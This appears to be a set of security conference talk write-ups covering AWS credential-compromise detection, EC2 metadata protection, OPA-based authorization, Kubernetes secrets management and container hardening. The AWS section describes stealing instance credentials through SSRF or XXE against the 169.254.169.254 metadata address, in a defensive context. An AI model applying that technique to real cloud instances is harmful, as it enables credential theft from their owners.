    "awsRegion": "us-east-2",
    "sourceIPAddress": "205.251.233.176",
    "userAgent": "ec2-api-tools 1.6.12.2",
    "requestParameters": {"instancesSet": {"items": [{"instanceId": "i-ebeaf9e2"}]}},
    "responseElements": {"instancesSet": {"items": [{
        "instanceId": "i-ebeaf9e2",
        "currentState": {
            "code": 0,
            "name": "pending"
        },
        "previousState": {
            "code": 80,
            "name": "stopped"
        }
    }]}}
}]}

Solution: Take 1

The first approach Will tried worked as follows:

  • Learn all of the IPs in your environment (across accounts) for the past hour
  • Compare each IP found in CloudTrail to the list of IPs
    • If we had the IP at the time of log - keep going 👍
    • If we DID NOT have the IP at the time of the log, ALERT

However, this approach did not end up working due to AWS API restrictions (pagination and rate limiting).

Solution: Success!

The solution that did work leveraged an understanding of how AWS works and made a strong but reasonable assumption. This approach lets you go from 0 to full coverage in about 6 hours (the length of time credentials are valid) and can also be applied to historical data.

Detecting Credential Compromise in AWS: AWS Process Overview

The strong assumption is: we assume that the first use of a given credential is legitimate, and we tie it to the current IP we observe for it.

A session table is maintained that tracks identifier, source_ip, arn, and ttl_value over time for each credential.

Detecting Credential Compromise in AWS: Solution
The pink path detects a potential compromise, that is, a CloudTrail event with an AssumedRole corresponding to a source IP that is not already present in the session table.
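The core of this logic can be sketched in a few lines of Python. This is a simplified illustration under stated assumptions, not Netflix's implementation: the in-memory `session_table` dict, the `check_event` function, the choice of `accessKeyId` as the credential identifier, and the sample events are all made up, and the `arn` and `ttl_value` columns are omitted.

```python
from typing import Dict, Optional

# Hypothetical session table: credential identifier -> first source IP seen.
session_table: Dict[str, str] = {}


def check_event(record: dict) -> Optional[str]:
    """Process one CloudTrail record; return an alert message or None."""
    identity = record.get("userIdentity", {})
    if identity.get("type") != "AssumedRole":
        return None  # only temporary role credentials are tracked here
    key = identity["accessKeyId"]
    source_ip = record["sourceIPAddress"]
    # Strong assumption: the first use of a credential is legitimate,
    # so the first IP observed becomes the expected IP for that credential.
    first_ip = session_table.setdefault(key, source_ip)
    if source_ip != first_ip:
        return f"ALERT: {key} first seen from {first_ip}, now used from {source_ip}"
    return None


# Made-up events: the same credential used twice from one IP, then from another.
events = [
    {"userIdentity": {"type": "AssumedRole", "accessKeyId": "ASIAEXAMPLE1"},
     "sourceIPAddress": "198.51.100.7"},
    {"userIdentity": {"type": "AssumedRole", "accessKeyId": "ASIAEXAMPLE1"},
     "sourceIPAddress": "198.51.100.7"},
    {"userIdentity": {"type": "AssumedRole", "accessKeyId": "ASIAEXAMPLE1"},
     "sourceIPAddress": "203.0.113.9"},
]
alerts = [check_event(e) for e in events]
```

Because the table only needs the first IP per credential, it can be built from the logs themselves rather than from a full inventory of the environment.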

At 28:22 Will shows a video of the process working in practice, including a Slack bot that messages a specific channel when good or bad credential usages are observed.

Edge Cases

There are a few edge cases you need to account for to prevent FPs:

  • AWS will make calls on your behalf using your creds if certain API calls are made (sourceIPAddress: <service>.amazonaws.com)
  • If you have AWS VPC endpoints for certain AWS services (sourceIPAddress: 192.168.0.22)
  • If you attach a new ENI or associate a new address to your instance (sourceIPAddress: something new if external subnet)
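A hedged Python sketch of how the first two edge cases might be filtered before alerting is shown below. The `is_expected_source` helper is hypothetical, and treating every private address as benign is an assumption that may be too permissive for a given environment. The third edge case (a new ENI or address) would instead require updating the session table.

```python
import ipaddress


def is_expected_source(source_ip: str) -> bool:
    """Return True for sourceIPAddress values covered by the first two edge cases."""
    if source_ip.endswith(".amazonaws.com"):
        return True  # an AWS service making calls on your behalf
    try:
        # Private addresses show up when calls go through a VPC endpoint.
        return ipaddress.ip_address(source_ip).is_private
    except ValueError:
        return False  # neither an IP address nor an AWS service name
```

For example, `is_expected_source("192.168.0.22")` is true, while a public address such as the one in the sample log above is not.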

Preventing Credential Compromise

While this approach is effective in practice, it’s not perfect.

Using server-side request forgery (SSRF) or XXE, an attacker could steal an instance’s credentials and then use them via the same method.

Specifying a blacklist of all of the ways a URL could represent http://169.254.169.254 in a WAF is prohibitively difficult, so they tried a managed policy that protects resources that are supposed to be internal only. However, this doesn’t protect externally exposed instances, of which they have many.
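To see why such a blacklist is hard to get right, the Python sketch below prints a few alternative spellings of the same address that some URL parsers and resolvers accept. The list is illustrative rather than exhaustive, and it leaves out other tricks such as DNS names that resolve to the address or HTTP redirects.

```python
import ipaddress

METADATA_IP = ipaddress.IPv4Address("169.254.169.254")
as_int = int(METADATA_IP)
octets = list(METADATA_IP.packed)  # the four bytes of the address

variants = {
    "dotted decimal": str(METADATA_IP),
    "single decimal integer": str(as_int),
    "single hex integer": hex(as_int),
    "dotted hex": ".".join(hex(o) for o in octets),
    "dotted octal": ".".join(f"0{o:o}" for o in octets),
}

for name, value in variants.items():
    print(f"{name:>24}: http://{value}/")
```

Each of these is a different string for a filter to match, yet they all denote the same 32-bit address.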

They looked at what GCP was doing, and observed that their metadata service required an additional header, which is great for protecting against these sorts of attacks, as typically with SSRF you can’t control the request’s HTTP headers.

Will went to the global AWS SDK team and asked if they’d be willing to add an additional header on every request, as it would allow them to build a proxy that protects the metadata service endpoint by blocking every request without that header.

The team said they can’t do that, as they didn’t want to send an additional header the IAM team wasn’t expecting.

So Will reviewed the various open source AWS SDK libraries, and observed that the Ruby one wasn’t sending a user agent, so he submitted a PR that added a user agent to its requests that indicates that it’s coming from the AWS Ruby SDK. When that PR was accepted, he took it to the Java and Python boto SDK teams and got their buy-in as well.

After each SDK team had implemented a user agent clearly demarcating that it was coming from an AWS SDK, Will went to the global AWS SDK team and asked them to commit to having these user agents not change, so that AWS users could implement a proxy deploying these protections.
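The check such a proxy would perform can be sketched as follows. This is a minimal illustration, not the proxy Netflix built: the `allow_metadata_request` function is hypothetical, and the prefixes in `ALLOWED_UA_PREFIXES` are assumptions that should be verified against the user agents your SDK versions actually send.

```python
# Assumed user agent prefixes; verify against your own SDK traffic.
ALLOWED_UA_PREFIXES = ("aws-sdk-", "Boto3/", "Botocore/", "aws-cli/")


def allow_metadata_request(headers: dict) -> bool:
    """Allow a request to the metadata service only if it looks SDK-originated."""
    user_agent = headers.get("User-Agent", "")
    return user_agent.startswith(ALLOWED_UA_PREFIXES)
```

The protection rests on the same observation made about GCP above: with SSRF, an attacker typically cannot control the request's headers, so a forged request arrives with the vulnerable application's user agent rather than an SDK's.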

A Masterclass in Organizational Influence
Though this story was just an aside in the overall presentation, it really stuck out to me as an impressive example of getting buy-in across diverse teams with different priorities. Nice work!

Resources

And as I called out in tl;dr sec #14, almost a year later, AWS released the v2 of the Instance Metadata Service, which implements several changes to make stealing instance credentials via SSRF or other web attack significantly harder in practice.
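For context, IMDSv2 is session-oriented: a client first obtains a token with a PUT request, then presents that token in a header on each metadata request. The Python sketch below only constructs the two requests (nothing is sent), and the helper names are made up for this example.

```python
import urllib.request

IMDS = "http://169.254.169.254"


def token_request(ttl_seconds: int = 21600) -> urllib.request.Request:
    """Step 1: a PUT request that asks IMDSv2 for a session token."""
    return urllib.request.Request(
        f"{IMDS}/latest/api/token",
        method="PUT",
        headers={"X-aws-ec2-metadata-token-ttl-seconds": str(ttl_seconds)},
    )


def metadata_request(path: str, token: str) -> urllib.request.Request:
    """Step 2: a GET request that presents the token in a header."""
    return urllib.request.Request(
        f"{IMDS}/latest/meta-data/{path}",
        headers={"X-aws-ec2-metadata-token": token},
    )
```

Requiring a PUT plus a custom header is what raises the bar: many SSRF bugs only let an attacker trigger a plain GET with no control over the method or headers.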



Containers / Kubernetes

Authorization in the Micro Services World with Kubernetes, ISTIO and Open Policy Agent

Sitaraman Lakshminarayanan, Senior Security Architect, Pure Storage
abstract slides video

The history of authz implementation approaches, the value of externalizing authz from code, authz in Kubernetes, and the power of using Open Policy Agent (OPA) for authz with Kubernetes and ISTIO.

Types of Access Control

Sitaraman describes 3 types of access control:

  • Role based: A set of roles are defined which map to API endpoints that may be hit or permissions the role has.
    • Then there are checks in code for the current user’s role or set of permissions.
  • Attribute based: Various aspects of a user or a request are used to make the decision, for example, the user’s age, title, location / IP address, or other attributes.
    • This may be a combination of inline code and external API calls to systems that have this additional info.
  • Policy based: A combination of the above two types, in which you define what role or group can perform what actions on a resource under certain conditions.
    • For example, Admin users who are on the VPN can add new Admin users to the system.
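The three types can be contrasted in a short Python sketch. The `User` class and the check functions are hypothetical and exist only to show how the decision inputs differ between the types.

```python
from dataclasses import dataclass


@dataclass
class User:
    name: str
    role: str
    on_vpn: bool


def role_based(user: User) -> bool:
    """Role based: the decision depends only on the user's role."""
    return user.role == "admin"


def attribute_based(user: User) -> bool:
    """Attribute based: the decision depends on an attribute of the user or request."""
    return user.on_vpn


def policy_based(user: User, action: str) -> bool:
    """Policy based: role, action, and condition are evaluated together."""
    return action == "add_admin" and role_based(user) and attribute_based(user)


alice = User("alice", role="admin", on_vpn=True)
bob = User("bob", role="admin", on_vpn=False)
```

Here `policy_based(alice, "add_admin")` passes, while the same call for `bob` fails because he is an admin who is not on the VPN.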

History of Access Control Implementations

Sitaraman describes how implementing access controls in web applications has evolved over time.

Firewalls could perform very crude access controls (mostly by network location and port), external API gateways can restrict access to specific endpoints, internal API gateways can protect internal only services you don’t want to expose, and custom business logic can be implemented in code for more nuanced, endpoint-specific decisions.

Challenges to Access Control Approaches

Implementing access controls in code means that the code must be updated whenever you want to modify authorization logic.

  • The update may not be quick and easy, meaning that fixing a bug takes time.
  • Updating a service in a complicated ecosystem with interdependencies between services may be hard.
  • If the expectations of what a role should or should not be able to do change over time, assumptions about the purpose of a role are littered throughout a code base.
  • Understanding the expected permissions for a role may be non-obvious, as the decisions are potentially littered through one or more large, complicated code bases.
  • Code changes require solid regression testing for access control bugs.

Pushing all access control decisions to API gateways can quickly become hard to manage in complex ecosystems with many roles and rules. Ops teams typically own the API gateway, so devs can’t directly make these changes, slowing down velocity due to the additional communication and process overhead.

How Do We Move Forward?

The goal is to externalize authorization from code, and not just with a gateway that acts as a checkpoint. It needs to be developer-friendly, and it must be easy to develop, deploy, and change policies.

The idea of externalizing authorization from code is actually not new; API gateways did this, as did the Extensible Access Control Markup Language (XACML) standard. It allowed the security or product teams to set authorization rules, not just devs.

However, XACML ended up failing because it required learning a separate, complicated syntax, causing more work for developers, and there weren’t many open source integrations.

What About Building Your Own Authorization API?

Authz in Microservices World: Authz API
Implementing authorization as a separate service or library that applications call

Pros:

  • As you own it, you can have it work exactly how you want, making it fit into your ecosystem nicely.

Cons:

  • Your security or engineering team will have to build and maintain it.
  • You’ll likely need to build (and maintain) client library SDKs for every language you use at your enterprise.
  • You’ll need to train every dev on your API and integration, and there’s no open source community to source information from.

In the end, Sitaraman argues that for many companies this isn’t a worthwhile investment due to both the upfront and recurring time costs. All of these efforts detract from building new features and improving your company’s product, which delivers business value.

Kubernetes Authorization

Authz in Microservices World: Kubernetes Authorization

Kubernetes web hook authz uses the following 3 aspects to make decisions: the resource being accessed, the action being performed (GET, POST, …), and the incoming user identity / token. Once enabled, every request to the Kubernetes API server will invoke the web hook, which returns an Allow or Deny.
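In practice, the API server sends the web hook a SubjectAccessReview object and expects one back with `status.allowed` set; for resource requests the action is expressed as a verb such as `get` or `delete`. The Python sketch below shows only the decision function, without an HTTP server. The `review` function and its rule (only members of an `ops` group may delete) are hypothetical.

```python
def review(sar: dict) -> dict:
    """Decide on a SubjectAccessReview and return the response body."""
    spec = sar["spec"]
    attrs = spec.get("resourceAttributes", {})
    # Hypothetical rule: only members of the "ops" group may delete resources.
    allowed = attrs.get("verb") != "delete" or "ops" in spec.get("groups", [])
    return {
        "apiVersion": sar["apiVersion"],
        "kind": "SubjectAccessReview",
        "status": {"allowed": allowed},
    }


# A made-up request: user "jane" in group "dev" tries to delete a pod.
request_body = {
    "apiVersion": "authorization.k8s.io/v1",
    "kind": "SubjectAccessReview",
    "spec": {
        "resourceAttributes": {"namespace": "default", "verb": "delete",
                               "resource": "pods"},
        "user": "jane",
        "groups": ["dev"],
    },
}
response_body = review(request_body)
```

The three inputs listed above map directly onto the request: the resource and action live in `resourceAttributes`, and the identity in `user` and `groups`.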

Why Sitaraman Loves the K8s AuthZ Model

  • It provides the framework and lets customers manage their own Risk.
  • There’s no one size fits all RBAC model that you have to conform your usage to, as is the case in some vendor models.
  • API-first design – everything is a Resource.
  • Externalized Authorization through the web hook lets you manage risk and implement policy and process around your deployment.

However, K8s authz can’t be used for your microservices and business-specific APIs. Instead, you need something like ISTIO.

ISTIO Overview

ISTIO acts like a proxy for you, handling protocol translation, and makes it easy to enforce authorization, do logging, collect telemetry, and set quotas. Typically you deploy the Envoy proxy as a sidecar.

In short, ISTIO is a lightweight proxy in front of your API services that operates at the Ingress and Egress layers.

Authz in Microservices World: ISTIO

ISTIO Authorization

ISTIO authz is specified in YAML files. Fine-grained ACLs can be challenging, and while this authz is external to the primary code, it still requires re-deployment when authz rules are changed.

apiVersion: "rbac.istio.io/v1alpha1"
kind: ServiceRole
metadata:
  name: tester
  namespace: default
spec:
  rules:
  - services: ["test-*"]
    methods: ["*"]
  - services: ["bookstore.default.svc.cluster.local"]
    paths: ["*/reviews"]
    methods: ["GET"]

ISTIO Service to Service

While deploying ISTIO hides the complexity of service discovery and service invocation (e.g. mTLS, protocol translation, etc.), we still need to do authz locally to each service.

We’re still reinventing the wheel: each client has its own authz embedded in the code or at the proxy level.

Externalizing AuthZ in a Microservices World

Let’s take a step back. What do we need to do authz in a microservices world? We need:

  • The Resource (end point being invoked)
  • The Operations / Actions being performed
  • Identity of Caller
  • Payload

You could build your own solution, or use Open Policy Agent!

Open Policy Agent

OPA is a policy engine, available as a RESTful JSON API, in which policies are written in the declarative language Rego. Policies are updated in OPA via the /v1/policies API endpoint.

OPA Policy Walkthrough

# Package Name
package httpapi.authz

# Static Data
subordinates = {"alice": [], "charlie": [], 
               "bob": ["alice"], "betty": ["charlie"]} 

# "input" is a keyword. 
# Assign input as the http_api variable
import input as http_api

# Examines the input to see if the request should be allowed.
# In this case, if the HTTP method is GET and the path is
# /finance/salary/<username>, where <username> is http_api.user
# Returns True if everything evaluates to True
allow {
  http_api.method = "GET" 	
  http_api.path = ["finance", "salary", username] 	
  username = http_api.user 
}
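For readers who are new to Rego, the same rule can be restated in Python as a reading aid. This is not how OPA evaluates policies; the `allow` function below is just an equivalent check written by hand.

```python
def allow(http_api: dict) -> bool:
    """Python restatement of the Rego `allow` rule above."""
    path = http_api.get("path", [])
    return (
        http_api.get("method") == "GET"
        and len(path) == 3
        and path[:2] == ["finance", "salary"]
        # The third path segment must be the caller's own username.
        and path[2] == http_api.get("user")
    )
```

In other words, a user may GET their own salary record and nothing else; any other input leaves `allow` undefined in Rego, which corresponds to `False` here.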

An example Python script to invoke this OPA policy:

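import requests

# Gather input.
# In a real service, an HTTP filter would gather all the data,
# such as user, method, URL path, etc.
api_user_from_jwt = "alice"  # placeholder; normally extracted from the JWT

# Create the document to hand to OPA under the "input" key.
# The path is a list of segments, matching the policy above.
input_dict = {
    "input": {
        "user": api_user_from_jwt,
        "path": ["finance", "salary", api_user_from_jwt],
        "method": "GET",
    }
}

# Call OPA via POST to /v1/data/{PolicyName}
# and supply the input. The decision is returned as JSON.
rsp = requests.post("http://example.com/v1/data/httpapi/authz",
                    json=input_dict)

# OPA wraps the decision in "result". "allow" is absent when the
# rule does not match, so default to False.
if rsp.json().get("result", {}).get("allow", False):
    print("request allowed")
else:
    print("request denied")

Authz in Microservices World: OPA and API Authz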
Architecture of a client calling the OPA API

Benefits of OPA

  • You can update the authz policy without changing the source code. Policies can be hot swapped.
  • There’s an API where you can get what authz decisions have been made, for example, how many were successful, how many were denied, etc.
  • Policy definitions can be left to development teams to implement, but left outside of the core business API.
  • OPA can be used beyond REST APIs: it can be integrated as a plugin into any external system that supports plugins (e.g. Kafka topics, SSH auth, thrift, AWS console, and more).

Can Kubernetes Keep a Secret?

Omer Levi Hevroni, DevSecOps Engineer, Soluto
abstract slides video

Omer describes his quest to find a secrets management solution that supports GitOps workflows, is Kubernetes native, and has strong security properties, which led to the development of a new tool, Kamus.

Requirements

Going in to his search, Omer had the following requirements for an ideal solution:

  • GitOps (placing the code, manifest files, and secrets in a git repo that is then distributed to the Kubernetes pods)
  • Kubernetes native - easy, seamless integration with Kubernetes
  • Secure - High quality, secure code, and “one-way encryption” (once the secret is encrypted, it can only be decrypted by the application that will be using it)

The pod itself is considered out of scope for this talk, as there are a number of orthogonal concerns and security requirements (e.g. Who can “SSH” in? What is running on the pod? Does the code leak the secrets?)

Option #1: Kubernetes Secrets

At first, Kubernetes Secrets seemed like a quick, easy win. However, secrets are base64 encoded, which is called out in the risks section in the documentation.

If you configure the secret through a manifest (JSON or YAML) file which has the secret data encoded as base64, sharing this file or checking it in to a source repository means the secret is compromised. Base64 encoding is not an encryption method and is considered the same as plain text.
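A two-line Python example shows how little protection base64 provides. The secret value here is made up.

```python
import base64

# What ends up in the manifest's "data" field.
encoded = base64.b64encode(b"s3cr3t-db-password").decode()

# Anyone who can read the manifest can reverse it, with no key required.
decoded = base64.b64decode(encoded).decode()
print(encoded, "->", decoded)
```

Encoding only changes the representation of the bytes, which is why the documentation treats it as equivalent to plain text.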

There are some other solutions, like helm-secrets and sealed-secrets, but using them has some key management challenges, you become coupled to a specific cluster/deployment method, and any change to the secret requires decryption.

Secrets can be consumed via environment variables (which have tradeoffs), volume mounts, or configuration files.

Kubernetes Secrets: The Environment Variable Debate

Option #2: Hashicorp Vault

Vault has a number of nice properties, but it requires a separate storage of secrets and deployment files (everything isn’t in a single git repo, so no single source of truth), requires an external permission model, and you have to manage the deployment and running of the service. There are some cloud vendor alternatives, such as AWS Secrets Manager, Azure Key Vault, and GCP berglas.

Option #3: Roll Your Own (Kamus)

Omer took inspiration from how Travis supports encrypted secrets, where users can include encrypted values in their .travis.yml files that can only be read by Travis CI.

So, Omer and his colleagues built Kamus, which is basically Travis secret encryption for Kubernetes.

Demo

Omer gives a demo of using Kamus at 19:52, and you can also follow along with a Kamus example in their GitHub repo.

Kamus Security

Kamus has the following permission model:

|      | Encrypt              | Decrypt              |
| User | Yes (can be limited) | No                   |
| Pod  | Yes                  | Only its own secrets |

Protections

User: secure by default permission model and CLI (enforces HTTPS, has support for certificate pinning).

Git: strong encryption using Azure KeyVault/GCP KMS (supports HSM protection and IP filtering, the latter of which makes it tough to exfiltrate secrets even in the case of a successful attack), one-way encryption.

Pod: secure by default permission model, in-memory volume for decrypted files.

Kamus API: Separate pods (crypto component is never exposed to the Internet), the encryptor supports authentication (if you want to limit who can speak to it), and every commit is scanned by Checkmarx (SAST), ZAP (DAST), and Snyk (out of date dependencies).

Accepted Risks

  • Clear text traffic inside the cluster (in practice it’s very hard to man-in-the-middle Kubernetes traffic in the cloud)
  • Any pod in the same namespace can mount any service account (Pod impersonation)
  • Service account token never expires

References

Kamus is also discussed in this blog post, and you can find the source code here.

How to Lose a Container in 10 Minutes

Sarah Young, Azure Security Architect, Microsoft
abstract slides video

In this talk, Sarah discusses container and Kubernetes best practices, insecure defaults to watch out for, and what happens when you do everything wrong and make your container or cluster publicly available on the Internet.

Moving to the Cloud? Tidy House

If you’re making the move to the cloud and containerizing your application, use this as an opportunity to tidy it up.

  • Everything should be encrypted at rest and in transit.
  • Use TLS 1.2 or 1.3.
  • Remove deprecated protocols.
  • Tidy up the code and simplify where possible.

Use Only Trusted Base Images

Make sure you know where your container images come from.

Try to minimize your use of images from the Internet by keeping your own base images.

You can use a private image repository, such as those from cloud providers (GCP Container Registry, Azure Container Registry, AWS Elastic Container Registry), GitLab container registry, or even run a private DockerHub registry (see also Notary).

Kubernetes’ Insecure Defaults

Kubernetes default configurations generally are fairly insecure, and you need to work through the orchestrator configs to secure them.

Especially dangerous Kubernetes defaults include the API server listening on port 8080 (unauth) and “secrets management” using etcd.

The CIS Kubernetes benchmark has some good advice for securing Kubernetes defaults.

Secrets Management

Rather than baking credentials and secrets into containers, pass them in as environment variables.
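On the application side, this can look like the Python sketch below. The `require_secret` helper and the `DB_PASSWORD` variable name are hypothetical; the variable is set inside the script only so that the example runs on its own.

```python
import os


def require_secret(name: str) -> str:
    """Read a secret from the environment, failing loudly if it is missing."""
    value = os.environ.get(name)
    if not value:
        raise RuntimeError(f"missing required secret: {name}")
    return value


# In a real deployment the orchestrator injects this at runtime;
# it is set here only so the sketch is self-contained.
os.environ["DB_PASSWORD"] = "example-only"
db_password = require_secret("DB_PASSWORD")
```

Failing at startup when a secret is absent tends to be easier to debug than a container that starts and then fails on its first database call.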

Kubernetes stores secrets in etcd, encoded in base64. D’oh. Instead, use the built-in secrets management functionality provided by major cloud platforms, such as AWS Secrets Manager, Azure Key Vault, and GCP berglas. If those don’t work for your use cases, you could also use a third-party secrets management system like Vault.

Rotate your secrets regularly, at least once a month if you can. Talk with your risk team to determine what makes sense.

See Can Kubernetes Keep a Secret? for more thoughts on storing secrets in Kubernetes and the tradeoffs on passing in secrets via environment variables.

Container Privilege Best Practices

#1 thing: Don’t run as root.

If you must run as root (e.g. your container needs to modify the host system), use runtime security tools to limit what is accessible. Check out Aqua Enforcer, SELinux, AppArmor and seccomp profiles.

Orchestrator Privilege Best Practices

As mentioned previously, Kubernetes had (and still has) some insecure defaults, including:

  • Anonymous user access isn’t disabled.
  • The dashboard had full admin privileges by default (prior to v1.7).
  • No RBAC before v1.8.

If you don’t have the internal expertise to manage Kubernetes, there’s no shame in using one of the managed offerings cloud platforms provide.

There are also some open source tools to declaratively manage Kubernetes clusters, such as kube-aws.

Ensure Your Tools Work on Containers / Kubernetes

When you move to the cloud and/or are containerizing applications, don’t assume your same tools will work. They might not.

Most security tools need to be specifically container/k8s aware, or may need additional plugins. Review the following areas: IDS/heuristics, vulnerability scanning, your SIEM, runtime security, and auditing.

The same goes for your CI/CD pipeline - the tools you’re using may need to be altered to work properly or replaced entirely.

Benchmark your tools with both developers and the security team. After all, a tool that doesn’t work for devs won’t get used.

Experiment: What Happens When You Do Everything Wrong?

Sarah spent a few months spinning up containers and Kubernetes clusters and leaving them open to the Internet. She intentionally disabled many built-in security features and overall did the inverse of everything she advocated doing in this talk.

She ran the containers on a cloud hosting provider so it wasn’t on her own infrastructure, and she paid through PayPal so she could avoid running up a big bill. The base containers she used were for Wordpress and Ubuntu 14.04.

Surprisingly, they were not compromised as quickly as she expected, and the overall level of attacks was lower than you’d think. One potential reason for this is that the cloud hosting provider may be offering other protections transparently behind the scenes.

Resources



Keynotes

Fail, Learn, Fix

Bryan Payne, Director of Engineering, Product & Application Security, Netflix
abstract slides video

History: Lessons from Electrical Work

Bryan did some electrical work over Christmas break and he was impressed that you could buy various parts made from different companies, put them together, and it was overall safe and straightforward.

How did they get to that place?

It wasn’t always this way. In the 1880s, it was a Wild West and people were getting electrocuted. But then a standards body was created that wrote a document, the “National Electrical Code,” containing those standards as well as best practices. This caused deaths from electrocution to trend down over time.

This is a general practice in engineering - examine failures, which may result from technical issues or people, and then spread that knowledge, so that the industry as a whole can learn and get better.

Fail, Learn, Fix in Computing

Bryan gives the example of the Therac-25, a software-controlled radiation therapy machine.

The Therac-25 had a software bug that ended up killing several people. Unlike prior machines, it didn’t have hardware protections that would blow a fuse and fail safely if parameters went outside of expected bounds.

The Therac-25 had a number of major flaws:

  • Lack of documentation
  • Insufficient testing
  • Cryptic / frequent error messages
  • Complicated software programmed in assembly
  • Custom real time OS
  • No fault tolerance / redundancy
  • Systemic failures - no hardware safeguards for software faults

Learnings included:

  • Test properly and thoroughly
  • Software quality and assurance must be a design priority from the beginning
  • Safety and quality are system attributes, not code attributes
  • Interface usability is important
  • Safety critical systems should be created by qualified personnel

A few years ago, someone wrote a retrospective on what had happened (The Therac-25: 30 years Later), and covered topics like: how has the industry evolved? Are we doing better?

The long and short of it is - not really.

But because of the Therac-25, a law was passed that allowed the FDA to do a mandatory recall of devices, and stats had to be aggregated for device failures.

Fail, Learn, Fix in Security

Software security started in government with the rainbow books, which were a set of guidelines for how you could evaluate the security of a system.

Fail, Learn, Fix: Rainbow Books

…security is expensive to set up and a nuisance to run… While we await a catastrophe, simpler setup is the most important step toward better security.

From Butler Lampson’s 2005 USENIX Security Keynote Address, Computer Security in the Real World.

This is still true today.

When Bryan rates how the security industry is doing currently, he gives it an A+ for Failing, C for Learning, and F for Fixing.

Paths to Success

Companies do retrospectives sometimes, but it’s all internal. We need to have detailed broader retrospectives on security issues with our peers. We’re not learning as much as we could be.

To Bryan, the biggest thing we need to do is not come up with some fancy new technical solution, but rather to talk, digging into the security problems we’re seeing together. What are the common themes? How do we start to move all of this forward together? As we do this, we can start to identify patterns.

Currently security patterns are sort of like the sewing industry - you can buy one from one company and it’s totally different from what you’d get somewhere else.

We need to think about how we can advance these patterns in a way that helps the whole industry. If there are problems in the patterns, then we fix them and the whole industry gets better, not just the one company.

Munawar Hafiz has a Security Pattern Catalog page that lists many patterns, and Microsoft has some nice ones on their Azure site as well.

If we want to make an actual difference, we need to find a way to package these patterns and make them easy for devs to adopt.

At Netflix, they have a config file where devs can simply set the following, which will have the application automatically use a strong, modern TLS configuration when communicating with other services.

ENDPOINT_SECURITY=enabled
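To give a feel for what a "secure by one flag" wrapper could look like, here's a hedged Python sketch. It is not Netflix's implementation: the function name, the way the flag is read, and the choice of TLS 1.2 as the minimum version are all my assumptions.

```python
import os
import ssl


def client_tls_context(env=None):
    """Return a strict TLS client context, or None when the flag is off."""
    env = os.environ if env is None else env
    # ENDPOINT_SECURITY mirrors the setting quoted above; reading it from
    # the environment is an assumption made for this sketch.
    if env.get("ENDPOINT_SECURITY", "").lower() != "enabled":
        return None
    ctx = ssl.create_default_context()  # verifies certificates and hostnames
    ctx.minimum_version = ssl.TLSVersion.TLSv1_2  # refuse older protocol versions
    return ctx
```

The point is that devs flip one setting and the security team owns what "strong and modern" means inside the helper, so tightening the configuration later doesn't require touching every service.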

Here’s how we can learn better:

  • Align on how we talk about our systems and our failures
  • Share lessons across the industry
  • Identify trends
  • Connect trends to risk/impact

Here’s how we can fix better:

  • Have security experts agree on proper patterns for fixing problems
  • Create real world implementations of the patterns
  • Ensure that it is trivial to use the implementations correctly
  • Integrate security into the computing ecosystem

Security Success Stories

Bryan calls out several security successes that are headed in the right direction.

Service to service auth has historically been different at every company, but SPIFFE offers a common way to handle service identity.

Software auto-updating, in browsers for example, has been a huge win. We should do this everywhere.

The percentage of Alexa 1M sites using HTTPS passed 50% in 2018, which is fantastic.

Let’s work on securing the whole system, not just a little slice of it. And let’s secure it in a way that works for everyone.

The way that we get there is by figuring out how we fail together, how we learn together, and ultimately how we fix the problems together.

Questions

Can you give a specific example of a failure Netflix had?

One AppSec engineer spent 6 - 9 months working on operationalizing an automated vulnerability scanner that never ended up finding a vulnerability.

The AppSec team learned that they didn’t have great scoping when they went into the project- their goals weren’t well aligned with reality.

Now the AppSec team focuses their efforts not on vulnerability identification but other areas in AppSec that are easier to solve.

They also learned that they need a set of objectives and success criteria much earlier in the process to determine whether they’re spending their time well.

This would have allowed them to pull the plug 3 weeks in when they realized it wouldn’t work, rather than after 6 months.

Should we standardize on certain configurations (e.g. TLS)? This might make it easier to update and deploy those updates everywhere across orgs, bringing everyone to the same security bar.

Bryan avoided saying “standards” in the presentation because people bristle at it. Standards are hard, but probably the direction we need. Standards are why networking works, but we’ve moved away from standards as we’ve gone up the stack, e.g. cloud services.

How to Slay a Dragon

Adrienne Porter Felt, Chrome Engineer & Manager, Google
abstract slides video

Adrienne has been on the Chrome security team for 6 years and focuses on usable security.

In this talk, she describes three ways to tackle fundamentally hard problems, using challenges the Chrome security team has faced as illustrative examples.

Hard Problems in the Real World

There may be some cases where there’s a clear path forward to solve a security problem with no tradeoffs. But in Adrienne’s experience, security is usually a tradeoff between security and something else that you need to make work at the same time.

For example, you can force people to regularly rotate their password. This helps if their credentials have been compromised, but you’ll have to deal with people forgetting their password, writing it down, and/or creating weak or easily guessed passwords.

Often, there is no right choice when it comes to security decisions - there are only imperfect solutions. You have to weigh hard to quantify risks with easier to quantify costs.

Regardless of the tradeoff you decide to make, you’re going to make some people unhappy.

Security is the art of making tradeoffs.

A dragon is a problem with imperfect solutions.

How to Slay a Dragon

When faced with an “impossible” problem that will have tradeoffs either way:

  1. Fight its little cousin instead
    • Find the more easily solvable variants of this problem.
    • You can do this over and over again to chip away at the sub parts of the problem that feel tractable.
  2. Accept imperfection and criticism
    • You’re going to have to accept that after you solve the little subproblems, eventually you’ll still have to make a hard call.
    • And people will criticize you for the tradeoffs you’ve chosen to make progress.
  3. Pay off your debt over time
    • Reduce the costs that your decision incurred.

She talks about 3 examples of this process.

Site Isolation

“Site isolation” is having one process for each origin. Adopting this model required changing many assumptions throughout the Chrome source.

The core tradeoff here is security vs memory.

After Spectre and Meltdown, the Chrome security team decided that the security benefit was worth it.

#1 Fight its little cousin instead

They made a massive dependency diagram of all the blockers, things they’d have to refactor, things that could cause performance challenges.

Rather than determining how to isolate everything off the bat, they first tackled iframes and extensions.

#2 Accept imperfection and criticism

After pulling off this incredible feat of engineering that had the security community excited, there were a number of tech outlets that complained about how Chrome now used more memory.

How to Slay a Dragon: Site Isolation
You can’t please everyone. Site isolation requires a fundamental security vs memory usage tradeoff

Chrome Security Indicators

The Chrome security team wanted to be able to indicate to users when their communications with a site were secure (over HTTPS).

They did a number of user studies and found that conveying this context to non technical users is fundamentally hard. They tried a number of icons, but it was tough to convey that HTTP wasn’t secure when the majority of websites at the time did not use TLS. If Chrome had adopted a red icon for HTTP sites on day one, this would have scared users - they would have thought the whole web was insecure, or perhaps that browsing in Chrome was insecure.

They decided that it was easier to get the Internet to move to HTTPS than to teach people the difference between HTTP and HTTPS. They partnered with Firefox and Let’s Encrypt to help get big, popular sites to use HTTPS.

After HTTPS adoption was higher, they could label HTTP as “not secure” instead of HTTPS as “secure.”

Displaying URLs

How do we help people understand web identity?

